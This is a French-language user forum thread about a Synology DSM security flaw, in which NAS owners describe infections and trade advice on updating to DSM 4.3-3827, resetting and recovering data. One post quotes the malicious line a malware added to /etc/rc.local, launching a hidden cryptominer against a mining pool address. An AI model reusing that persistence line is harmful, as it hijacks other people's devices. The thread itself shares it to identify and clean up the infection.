Aller au contenu

Important - Synology Corrige Une Faille De S


rodo37

Messages recommandés

Salut la communauté,

Pourriez vous m'indiquer un moyen de mettre à jour le DSM sans passer par la fonction "mise à jour/mise à jour manuelle" svp ?

Je n'y ai plus accès car je suis également infecté et j'aimerai éviter le reset du système...

D'avance merci.

Lien vers le commentaire
Partager sur d’autres sites

Au sujet de la faille :
La simple migration vers de DSM 4.0 2228 vers DSM 5.0 corrige t elle le problème ou il faut appliquer un patch particulier ?
Faut il passer par le double reset et la réinstallation complète ?
Le NAS en question serait infecté ( un process httpd-log.pid qui consomme 99% du CPU).

Je suis à 600 km du NAS...

Lien vers le commentaire
Partager sur d’autres sites

J'ai un problème avec mon DS413

Suite à une coupure de courant, plus d'accès au NAS que ce soit via l'IHM web ou via putty

Mon NAS est visible sur l'assistant en mode démarrage des services

Il est en vert sur le Centre MyDS

Je n'avais pas fait de mapping réseau donc je ne sais pas si je peux y accéder

Ma led bleue clignotte

Ma led status est éteinte

Je suis aussi en DSM 4.3-3810, j'ai vu sur le support qu'il y avait un correctif du DSM suite à la faille de sécurité mais bien sûr je ne peux pas l'installer pour le moment

J'ai tenté le double reset le NAS ne s'éteint plus

Bref je suis bloqué

Quelqu'un a une idée sur le sujet ?

Désolé Kranebus, pas d'idée. Par contre je te conseille de faire un topic spécifique à ton pb car il me semble que cela ne correpond pas au sujet sur la faille. Tu auras sans doute plus de réponses comme ça.

Salut la communauté,

Pourriez vous m'indiquer un moyen de mettre à jour le DSM sans passer par la fonction "mise à jour/mise à jour manuelle" svp ?

Je n'y ai plus accès car je suis également infecté et j'aimerai éviter le reset du système...

D'avance merci.

Anperfo, peut être par l'outil synology assitant? Je crois que je n'ai l'ai jamais utilisé moi même donc je ne sais pas trop ce qu'il permet de faire. A télécharger sur le sitede synology et à utiliser sur le réseau local où il y a le nas.

Au sujet de la faille :

La simple migration vers de DSM 4.0 2228 vers DSM 5.0 corrige t elle le problème ou il faut appliquer un patch particulier ?

Faut il passer par le double reset et la réinstallation complète ?

Le NAS en question serait infecté ( un process httpd-log.pid qui consomme 99% du CPU).

Je suis à 600 km du NAS...

Pierre-Olivier je ne suis pas sûr que DSM 5.0 corrige la faille mais en tout cas la verison 4.3-3827 le fait (voir le changelog donné par synology). Par contre il semble qu'il puisse rester quelques traces (voir plus bas dans ce post), et je ne sais pas si elles comportent des risques.

Et pour en revenir à mon pb (quand même un peu hein ;))

En fait ipkg était toujours installé ( le dossier /volume1/@optware existait toujours)

En fait je n'avais pas suivi les procédures de réactivation complètement. IPKG s'était déjà désactivé suite à une maj et je n'avais eu besoin que de rajouter "/opt/bin:/opt/sbin" après "PATH=" dans le dossier /root/.profile.

Mais en fait le malware avis aussi modifier le fichier /etc/rc.local ce qui empêchait ipkg de fonctionner.

J'en viens à ma question :

Le fichier rc.local contenait le code suivant

/var/run/httpd-log.pid -B -q -o stratum+tcp://5.178.66.104:3333
exit 0
Sachant que le fichier /var/run/httpd-log.pid n'existe pas, est-ce que cela présente un risque? Par sécurité j'ai pour l'instant mis de coté le fichier rc.local modifié en le renommant rc.local.sav (pour pouvoir copier le code ici), bloqué l'ip mentionné dans le code et bloqué le port 3333 via le firewall du syno (port source 3333 bloqué sur le protocole TCP).
Un poste sur les forums syno indiquait que même en commentant le code et sans le fichier /var/run/httpd-log.pid il avait toujours un process qui prenait 99% de CPU, mais moi je n'ai jamais eu ce symptôme.
Mes 2 questions sont donc sur :
- mon mot de passe admin? (risque ou pas)
- risque rapport au rc.local
En gros est-ce qu'il vaut vraiment mieux faire le reset et qu'est qui disparait dans ce cas? (comptes, package installé (sab, subsonic, COPS..., les paramètres des paquets, ...)
Modifié par M4rcus
Lien vers le commentaire
Partager sur d’autres sites

Bonjour M4rcus

Pour ma part j'ai contacté le support Synonlogy, ils m'ont énormément aidé.

Mon NAS a été hacké, il y a eu beaucoup de dégâts et il m'ont dit que c'était bien à cause de la faille de sécurité

Ils m'ont rétabli un accès pour que je puisse sauver des données et ensuite je vais devoir tout réinstaller.

Bonne journée à tous

Lien vers le commentaire
Partager sur d’autres sites

Bonjour M4rcus

Pour ma part j'ai contacté le support Synonlogy, ils m'ont énormément aidé.

Mon NAS a été hacké, il y a eu beaucoup de dégâts et il m'ont dit que c'était bien à cause de la faille de sécurité

Ils m'ont rétabli un accès pour que je puisse sauver des données et ensuite je vais devoir tout réinstaller.

Bonne journée à tous

Merci de nous en informer.

Il eut été plus logique de le faire plutôt vous ne pensez pas ?

Lien vers le commentaire
Partager sur d’autres sites

Bonjour,

J'ai eu une coupure de courant hier et depuis je n'arrive plus à accéder à mon DSM4.3 en utilisant les user et pasword. Par contre, j'arrive à accéder à tous mes fichiers via l'explorateur de windows.

Quand j'essai de me connecter sur mon DS213air j'ai le message "le système se prépare" et rien à faire même en essayant de rebooter en enlevant l'alim ! J'ai essayé d'appuyer sur le bouton reset pendant 4 ou 10 secondes mais pas de bit !

J'ai vérifié en SSH et j'ai malheureusement le fichier “S99p.sh” sous “/usr/syno/etc/rc.d”

Je ne sais pas s'il est possible en SSH d'upgrader vers le DSM5.0 et de retrouver enfin un accès normal à mon syno ?

Merci pour votre aide.

Vincent

Modifié par vince85
Lien vers le commentaire
Partager sur d’autres sites

Bonjour,

Je sais pas que ce n'ai pas l'idéal, mais il était sur onduleur et c'est un problème de l'onduleur qui est à l'origine. Cependant, le système tourne et je pense que c'est un problème lié au virus car j'ai souhaité pour le première fois installer différents paquets hier et je pense que cela a ouvert des portes ....

Vincent

Lien vers le commentaire
Partager sur d’autres sites

  • 2 semaines après...

bonsoirà HommeTranquille

moi je n'ai pas suivi ce que tu ctes

j'ai :

1/ sauvegardé sur un pc local ma config

2/ coché dans l'outil de maj DSM du panneau de config, la case "maj importantes de sécurité"

3/ téléchargé la maj DSM 4.3 3827

http://ukdl.synology.com/download/DSM/4.3/3827/

installé cette maj

au bout de 2 minutes, terminé, redémarrage et login avec ton mdp d'avant (admin)

4/ reouvet l'outil de maj DSM du panneau de config

là il dit qu'il y a une Update encore disponible, je clique sur le bouton télécharger

5/ il l'installe tout seul et, de nouveau après 2 minutes, la fenetre login réapparait

6/ après login en admin, je restaure la config système et application et j'ai retrouvé tout mon petit monde comme avant, nickel

Lien vers le commentaire
Partager sur d’autres sites

  • 2 semaines après...

Bonjour Stephane83,

Il n'y a aucun problème de sécurité ou vulnérabilité sur DSM 5.0.

Nous restons à votre disposition.

Equipe Synology Marketing

Bonjour,

Sur un DS112J, depuis la maj recommandée en 5.0-4458, je n'ai plus accés au syno.

Seul le Synology Assistant peut y acceder et me signale en statut : "Pouvant être migré" et quand j'essaie de lui réinstaller un correctif de firmware (DSM_DS112j_4458.pat),

j'obtiens le message : "Vous devez utiliser 4458 ou un fichier d'installation d'une version ultérieure"

Le voyant Power bleu clignote,

le voyant STATUTest vert fixe,

le voyant LAN est vert,

le voyant DISK est éteint (il s'allume lors du démarrage).

Si quelqu'un sait comment reprendre la main ? merci

Lien vers le commentaire
Partager sur d’autres sites

  • 4 semaines après...

Bonjour à tous,

J'ai bien lu tout ce fil et je pense aussi m'être fait hacker, j'ai exactement les mêmes symptômes que ceux figurant sur ce site: http://blog.jandorsman.com/blog/synology-error-ldpreload-cannot-be-preloaded

Mon Synology est en DS 4.3-3776.

Le gros problème, c'est que j'ai un de mes répertoires qui a complètement disparu alors que j'étais en train de travailler dessus. Ce répertoire est essentiel pour moi et malheureusement, je n'avais pas de sauvegarde complète, étant donné sa taille (900 gigas). Je ne sais pas si ce répertoire a disparu suite au hack ou à un bug du synology. J'ai contacté le Synology Support mais ça fait plus d'une semaine que j'attends et toujours pas de réponse...

Pensez-vous que je peux installer le DSM 5.0 pour pallier à ce hack ou vaut-il mieux que j'attende une réponse de Synology ?

J'ai également tenté de retrouver des fichiers effacés au cas où mais je n'ai trouvé aucun programme qui me permette de "voir" les fichiers réseaux du Synology, même mappé sous Windows.

Je suis assez désespéré par cette situation, alors si jamais un membre de ce forum avait un conseil à me donner, je suis preneur !

Merci à vous.

Modifié par Chander
Lien vers le commentaire
Partager sur d’autres sites

Avant de passer à la 5.0 vous avez 2 autres versions de la 4.3 à votre disposition : la 3810 et surtout la 3827 qui corrige la faille. Cette dernière version en est à l'update 2.

Je vous conseille très fortement de charger cette dernière version avant d'envisager de passer à la 5.0, sans quoi vous risquez de créer d'autres problèmes.

En aucun cas les mises à jour du DSM ne touchent aux données. Vous pouvez procéder sans crainte avec la 3827.

Vous pouvez le faire directement du DSM en allant dans "Mise à jour du DSM" dans le panneau de configuration.

Avant de faire quoi que ce soit, vous allez dans "Options de mise à jour", vous sélectionnez "Mises à jour importantes" et vous validez. Le NAS va chercher sur le site Synology la dernière maj de la 4.3. Il devrait vous proposer la 3827 seule.

Vous procédez à cette mise à jour.

Après le redémarrage, vous retournez dans la mise à jour où vous devriez avoir l'update 1 ou directement l'update 2, c'est selon. Si c'est seulement l'update 1, vous l'installez puis vous installez la 2 après le redémarrage.

Suite à ces mises à jour, il est possible que vous retrouviez votre dossier.

Sinon, si vous n'avez pas fait de fausse manip, il ne devrait pas avoir disparu. Pour le savoir, vous activez le terminal ssh (menu Terminal du DSM).

Sur votre PC vous téléchargez le logiciel WinSCP qui va vous permettre de parcourir tout votre disque. Vous lancez WinSCP, vous renseignez le nom d'hôte (l'adresse IP de votre NAS), le port (22 pour le ssh), nom d'utilisateur "root" et le mot de passe qui est celui du compte admin du DSM.

Vous allez dans le dossier "volumeX" (ou X est le numéro de volume qui contient vos données). Vous y trouverez des dossiers "@xxxxx". Ce sont des dossiers cachés du système et des paquets. Ensuite vous aurez vos dossiers partagés et un dossier homes qui est celui qui contient tous les dossiers utilisateurs.

Si vous retrouvez votre dossier, je vous conseille tout d'abord de faire une sauvegarde à partir de WinSCP avant de faire quoi que ce soit au niveau du NAS. Une fois la sauvegarde faite, vous pouvez tenter de récupérer votre dossier et si c'est impossible, de le recréer puis de le remplir avec les données sauvegardées.

Lien vers le commentaire
Partager sur d’autres sites

Salut tout le monde,

Bon bein je crois que moi aussi je suis infecté.

J'ai un DS212J avec la version 4.3.3776.

Je me suis rendu compte hier en me connectant sur le serveur que j'avais plein de tentatives de connexion en échec dans la partie "Journaux récents".

J'ai tenté de me connecté au moniteur de ressource et là, surprise: Impossible d'accéder au moniteur de ressource => Message erreur " La connexion a échoué. Veuillez vérifier vos paramètres réseau"

Après des recherches sur le net, j'arrive enfin sur ce post.

J'ai télécharger le correctif DSM_DS212j_3827.pat sur le site de Synology pour faire une mise à jour manuelle comme beaucoup l'on fait ici.

Mais mon pb, c'est que lorsque je clique sur "Mise à jour DSM" dans le panneau de configuration, j'ai exactement le même message d'erreur que lorsque j'essaye d'accéder au moniteur de ressource.

Du coup, je suis perdu et je sais pas comment mettre à jour mon firewall.

Est ce que vous pouvez m'aider svp ?

Merci.

Nico.

Salut Nico ,

Du coup comment as tu fais car je suis dans le même problème ?

Merci pour ta réponse

Ou si quelqu'un d'autre peut m'aider ...

Lien vers le commentaire
Partager sur d’autres sites

Avant de passer à la 5.0 vous avez 2 autres versions de la 4.3 à votre disposition : la 3810 et surtout la 3827 qui corrige la faille. Cette dernière version en est à l'update 2.

Je vous conseille très fortement de charger cette dernière version avant d'envisager de passer à la 5.0, sans quoi vous risquez de créer d'autres problèmes.

En aucun cas les mises à jour du DSM ne touchent aux données. Vous pouvez procéder sans crainte avec la 3827.

.... ....

Merci m'sieur mais pour moi, c'est trop tard !

je suis passé de la 4.3 à 5.0 de peur de me faire pirater

et now, je me trouve avec un DS410J qui à grave perdu en réactivité

certe, la 5.0 est trés séduisante de par son design et ses nouvelle possibilitée mais ma 4.3 me convenais parfaitement.

donc :

MÉFIANCE !!!

SI VOUS AVEZ DE PETITES CONFIGUES

NE PASSEZ PAS À LA 5.0 SANS RÉFLÉCHIR !!!

en conclusion je dirais que : beaucoup de bruit pour peut de choses ....

Modifié par atdd10
Lien vers le commentaire
Partager sur d’autres sites

Bonjour atdd10. Je suis vraiment désolé pour vous. Décidément, cette 5.0 laisse encore un goût amer à beaucoup de ceux qui s'y sont fait prendre.

Ce n'est pourtant pas faute de l'écrire de long en large avec beaucoup d'insistance sur les fils de ce forum et sur la shoutbox : ne surtout pas migrer si vous n'en n'avez pas l'utilité.

Je n'ai rien contre ce nouveau DSM, mais c'est comme pour tous les nouveaux OS : ne jamais y aller sans un bonne raison. Si ce Inutile de mettre en péril ce qui fonctionne.

Il est préférable de perdre sereinement du temps à attendre une version stable que de se battre avec un nouveau système qui demande encore de la mise au point.

Je suis encore en 4.3 et si la 5.0 continue à avoir des retours aussi négatifs, je suis prêt à me priver des innovations de la 5.0 et faire durer la 4.3 encore des mois jusqu'à que je sois convaincu de la qualité de la 5.

Lien vers le commentaire
Partager sur d’autres sites

Bonjour atdd10. Je suis vraiment désolé pour vous. Décidément, cette 5.0 laisse encore un goût amer à beaucoup de ceux qui s'y sont fait prendre.

Ce n'est pourtant pas faute de l'écrire de long en large avec beaucoup d'insistance sur les fils de ce forum et sur la shoutbox : ne surtout pas migrer si vous n'en n'avez pas l'utilité.

Je n'ai rien contre ce nouveau DSM, mais c'est comme pour tous les nouveaux OS : ne jamais y aller sans un bonne raison. Si ce Inutile de mettre en péril ce qui fonctionne.

Il est préférable de perdre sereinement du temps à attendre une version stable que de se battre avec un nouveau système qui demande encore de la mise au point.

Je suis encore en 4.3 et si la 5.0 continue à avoir des retours aussi négatifs, je suis prêt à me priver des innovations de la 5.0 et faire durer la 4.3 encore des mois jusqu'à que je sois convaincu de la qualité de la 5.

Mouais, pourtant cette version de DSM 'la 5.0" fonctionne parfaitement...

Je suis curieux de connaitre les paquets utilisés par les gens qui s'en plaignent.

Lien vers le commentaire
Partager sur d’autres sites

Mouais, pourtant cette version de DSM 'la 5.0" fonctionne parfaitement...

Je suis curieux de connaitre les paquets utilisés par les gens qui s'en plaignent.

Chez moi aussi la version 5 fonctionne parfaitement ...

Comme sans doute pour la majorité de ceux qui l'ont installée. Et heureusement encore. Ce serait un comble si Synology mettait un DSM vérolé sur ses NAS !

Ce que je dis, c'est que malgré les correctifs, il y a encore pas mal d'utilisateurs qui ont des problèmes, et qu'il n'y a pas d'urgence à passer à la 5.0 si le système en place fonctionne correctement et satisfait les besoins.

Lien vers le commentaire
Partager sur d’autres sites

Bonjour à tous

J'ai reçu le mail de synology m'invitant à mettre mon DSM à jour. Mais depuis dimanche quand j'essaie de procéder à cette mise à jour j'ai un message d'erreur me disant qu'il faut que je passe à la version 4.2 (je crois) avant de profiter de cette upgrade.

Je ne sais pas ou trouver cette version sachant qu'elle n'est plus disponible sur le centre de téléchargement. J'utilise actuellement la version 4.0-2219 avec un DS212j.

Pourriez vous me donner des pistes?

Merci

Lien vers le commentaire
Partager sur d’autres sites

Normalement si vous passez par la mise à jour à partir du DSM, vous ne pouvez télécharger que la version qui peut-être installée. Par ailleurs, vous ne pouvez pas installer un update si le nas n'a pas la version de base.

Pour effectuer vos mises à jour sans installer la 5.0, vous devez tout d'abord sélectionner l'option "mise à jours importantes" dans les options de mise à jour du menu "Mise à jour du DSM".

Si vous avez sélectionné cette option, le statut devrait vous indiquer la mise à jour que vous pouvez installer. Si vous voulez installer la 4.3 qui corrige la faille, il vous faudra peut-être passer par la 4.2. Arrivé à la 4.3, vous aurez encore une, voire deux autres mise à jour à faire pour les updates.

Sinon, pour les chargements manuels, c'est ici

Modifié par Mic13710
Lien vers le commentaire
Partager sur d’autres sites

  • 2 semaines après...

Bonsoir,

Je viens de m'apercevoir que j'ai un nouveau partage startup qui est apparu et en me renseignant sur le web, je m'aperçoit que je me suis fait hacker:

J'ai donc fait la mise à jour de mon Syno de 4.2 en 4.3 et j'ai renommé le répertoire et le fichier à l'intérieur mais je voulais savoir s'il y a avait d'autre chose à faire (suppression de fichier, répertoire, ... )

Merci d'avance.

Lien vers le commentaire
Partager sur d’autres sites

Rejoindre la conversation

Vous pouvez publier maintenant et vous inscrire plus tard. Si vous avez un compte, connectez-vous maintenant pour publier avec votre compte.

Invité
Répondre à ce sujet…

×   Collé en tant que texte enrichi.   Coller en tant que texte brut à la place

  Seulement 75 émoticônes maximum sont autorisées.

×   Votre lien a été automatiquement intégré.   Afficher plutôt comme un lien

×   Votre contenu précédent a été rétabli.   Vider l’éditeur

×   Vous ne pouvez pas directement coller des images. Envoyez-les depuis votre ordinateur ou insérez-les depuis une URL.

×
×
  • Créer...

Information importante

Nous avons placé des cookies sur votre appareil pour aider à améliorer ce site. Vous pouvez choisir d’ajuster vos paramètres de cookie, sinon nous supposerons que vous êtes d’accord pour continuer.